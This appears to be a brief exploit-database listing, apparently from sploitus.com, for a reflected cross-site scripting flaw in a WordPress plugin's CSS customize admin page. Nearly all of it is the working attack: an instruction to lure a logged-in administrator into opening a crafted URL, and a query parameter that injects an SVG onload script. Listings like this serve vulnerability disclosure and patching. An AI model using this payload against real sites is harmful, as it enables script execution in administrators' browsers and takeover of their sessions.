Share 
## https://sploitus.com/exploit?id=WPEX-ID:5110FF02-C721-43EB-B13E-50ACA25E1162
Make a logged in admin open the below URL using web browser which does not encode characters

https://example.com/wp-admin/admin.php?page=vkExUnit_css_customize&b="><svg/onload=alert(/XSS/)>